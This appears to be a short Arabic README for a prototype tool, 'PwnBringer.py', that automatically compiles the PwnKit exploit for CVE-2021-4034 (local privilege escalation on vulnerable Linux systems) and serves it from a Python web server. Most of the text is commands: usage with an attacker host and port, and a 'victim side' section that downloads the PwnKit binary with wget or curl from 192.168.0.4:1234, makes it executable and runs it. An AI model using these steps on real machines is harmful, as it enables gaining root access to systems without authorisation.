
أتمتة تجميع وتشغيل استغلال PwnKit لثغرة CVE-2021-4034، مما يتيح تصعيد الامتيازات المحلية على أنظمة لينكس الضعيفة.
توليد تلقائي وتشغيل خادم لـ PwnKit
يقوم بتجميع الكود المصدري إلى ملف ثنائي لـ pwnkit ويتم تشغيل خادم بايثون تلقائيًا،
هذا نموذج أولي لذا، قد لا يعمل اعتمادًا على البيئة.
chmod +x PwnBringer.py
./PwnBringer.py <lhost> <lport>

[جانب الضحية]
user1@deb:~$ wget http://192.168.0.4:1234/PwnKit
user1@deb:~$ chmod +x PwnKit
user1@deb:~$ ./PwnKit
أو
user1@deb:~$ curl http://192.168.0.4:1234/PwnKit -o PwnKit
user1@deb:~$ chmod +x PwnKit
user1@deb:~$ ./PwnKit
